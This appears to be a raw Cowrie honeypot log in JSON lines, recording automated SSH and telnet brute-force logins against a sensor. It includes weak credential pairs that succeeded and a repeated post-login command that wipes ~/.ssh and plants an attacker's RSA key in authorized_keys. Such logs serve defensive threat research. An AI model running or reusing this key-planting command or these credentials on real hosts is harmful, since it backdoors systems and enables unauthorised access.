{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:22:30.928931Z","src_ip":"212.227.235.229","session":"03caf7ba5e6c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:22:31.145649Z","src_ip":"212.227.235.229","session":"03caf7ba5e6c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:31.146498Z","src_ip":"212.227.235.229","session":"03caf7ba5e6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48210,"dst_ip":"1.2.3.4","dst_port":22,"session":"407d3ac22c29","protocol":"ssh","message":"New connection: 212.227.235.229:48210 (1.2.3.4:22) [session: 407d3ac22c29]","sensor":"my-vps","timestamp":"2025-08-26T13:22:31.337628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:22:31.342643Z","src_ip":"212.227.235.229","session":"407d3ac22c29"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:22:31.541638Z","src_ip":"212.227.235.229","session":"407d3ac22c29"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:22:32.371900Z","src_ip":"212.227.235.229","session":"407d3ac22c29"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:33.570510Z","src_ip":"212.227.235.229","session":"407d3ac22c29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49678,"dst_ip":"1.2.3.4","dst_port":22,"session":"baee3acf9faf","protocol":"ssh","message":"New connection: 212.227.235.229:49678 (1.2.3.4:22) [session: baee3acf9faf]","sensor":"my-vps","timestamp":"2025-08-26T13:22:33.789461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:22:33.790378Z","src_ip":"212.227.235.229","session":"baee3acf9faf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:22:34.003732Z","src_ip":"212.227.235.229","session":"baee3acf9faf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:22:34.910375Z","src_ip":"212.227.235.229","session":"baee3acf9faf"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:35.144169Z","src_ip":"212.227.235.229","session":"03caf7ba5e6c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:35.145043Z","src_ip":"212.227.235.229","session":"baee3acf9faf"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64244,"dst_ip":"1.2.3.4","dst_port":22,"session":"829092a4eac2","protocol":"ssh","message":"New connection: 217.72.205.35:64244 (1.2.3.4:22) [session: 829092a4eac2]","sensor":"my-vps","timestamp":"2025-08-26T13:22:45.955425Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:45.956640Z","src_ip":"217.72.205.35","session":"829092a4eac2"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":41488,"dst_ip":"1.2.3.4","dst_port":22,"session":"399ed09e24b6","protocol":"ssh","message":"New connection: 167.99.49.89:41488 (1.2.3.4:22) [session: 399ed09e24b6]","sensor":"my-vps","timestamp":"2025-08-26T13:23:07.187197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:23:07.188242Z","src_ip":"167.99.49.89","session":"399ed09e24b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:23:07.280199Z","src_ip":"167.99.49.89","session":"399ed09e24b6"}
{"eventid":"cowrie.login.success","username":"root","password":"ABC123abc","message":"login attempt [root/ABC123abc] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:23:07.688021Z","src_ip":"167.99.49.89","session":"399ed09e24b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:23:07.920651Z","src_ip":"167.99.49.89","session":"399ed09e24b6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:23:07.921424Z","src_ip":"167.99.49.89","session":"399ed09e24b6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:23:07.922925Z","src_ip":"167.99.49.89","session":"399ed09e24b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:23:08.015930Z","src_ip":"167.99.49.89","session":"399ed09e24b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:23:08.259801Z","src_ip":"167.99.49.89","session":"399ed09e24b6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:23:08.260550Z","src_ip":"167.99.49.89","session":"399ed09e24b6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:23:08.354176Z","src_ip":"167.99.49.89","session":"399ed09e24b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:23:08.355335Z","src_ip":"167.99.49.89","session":"399ed09e24b6"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":41504,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee4454f8e047","protocol":"ssh","message":"New connection: 167.99.49.89:41504 (1.2.3.4:22) [session: ee4454f8e047]","sensor":"my-vps","timestamp":"2025-08-26T13:23:08.442504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:23:08.443285Z","src_ip":"167.99.49.89","session":"ee4454f8e047"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:23:08.533005Z","src_ip":"167.99.49.89","session":"ee4454f8e047"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56876,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5d68a3f3904","protocol":"ssh","message":"New connection: 212.227.235.229:56876 (1.2.3.4:22) [session: a5d68a3f3904]","sensor":"my-vps","timestamp":"2025-08-26T13:23:08.880970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:23:08.881871Z","src_ip":"212.227.235.229","session":"a5d68a3f3904"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:23:08.932764Z","src_ip":"167.99.49.89","session":"ee4454f8e047"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:23:09.129777Z","src_ip":"212.227.235.229","session":"a5d68a3f3904"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:23:10.024834Z","src_ip":"167.99.49.89","session":"ee4454f8e047"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":41512,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd90ed2da350","protocol":"ssh","message":"New connection: 167.99.49.89:41512 (1.2.3.4:22) [session: cd90ed2da350]","sensor":"my-vps","timestamp":"2025-08-26T13:23:10.128480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:23:10.129776Z","src_ip":"167.99.49.89","session":"cd90ed2da350"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:23:10.234023Z","src_ip":"167.99.49.89","session":"cd90ed2da350"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:23:10.690546Z","src_ip":"167.99.49.89","session":"cd90ed2da350"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:23:10.796018Z","src_ip":"167.99.49.89","session":"399ed09e24b6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:23:10.797073Z","src_ip":"167.99.49.89","session":"cd90ed2da350"}
{"eventid":"cowrie.login.failed","username":"ruoyi","password":"123456","message":"login attempt [ruoyi/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:23:10.803939Z","src_ip":"212.227.235.229","session":"a5d68a3f3904"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:23:12.056538Z","src_ip":"212.227.235.229","session":"a5d68a3f3904"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":58844,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdbffe289dcb","protocol":"telnet","message":"New connection: 176.65.149.186:58844 (1.2.3.4:23) [session: fdbffe289dcb]","sensor":"my-vps","timestamp":"2025-08-26T13:23:14.260196Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:23:14.299222Z","src_ip":"176.65.149.186","session":"fdbffe289dcb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:23:14.320130Z","src_ip":"176.65.149.186","session":"fdbffe289dcb"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T13:23:14.321178Z","src_ip":"176.65.149.186","session":"fdbffe289dcb"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T13:23:14.321869Z","src_ip":"176.65.149.186","session":"fdbffe289dcb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49248,"dst_ip":"1.2.3.4","dst_port":22,"session":"73ce809a7e06","protocol":"ssh","message":"New connection: 212.227.235.229:49248 (1.2.3.4:22) [session: 73ce809a7e06]","sensor":"my-vps","timestamp":"2025-08-26T13:23:21.318209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:23:21.319031Z","src_ip":"212.227.235.229","session":"73ce809a7e06"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:23:21.568431Z","src_ip":"212.227.235.229","session":"73ce809a7e06"}
{"eventid":"cowrie.login.failed","username":"user","password":"toor","message":"login attempt [user/toor] failed","sensor":"my-vps","timestamp":"2025-08-26T13:23:22.609768Z","src_ip":"212.227.235.229","session":"73ce809a7e06"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:23:23.860874Z","src_ip":"212.227.235.229","session":"73ce809a7e06"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":33542,"dst_ip":"1.2.3.4","dst_port":22,"session":"a33b8ad4ff6d","protocol":"ssh","message":"New connection: 45.88.8.215:33542 (1.2.3.4:22) [session: a33b8ad4ff6d]","sensor":"my-vps","timestamp":"2025-08-26T13:24:02.437656Z"}
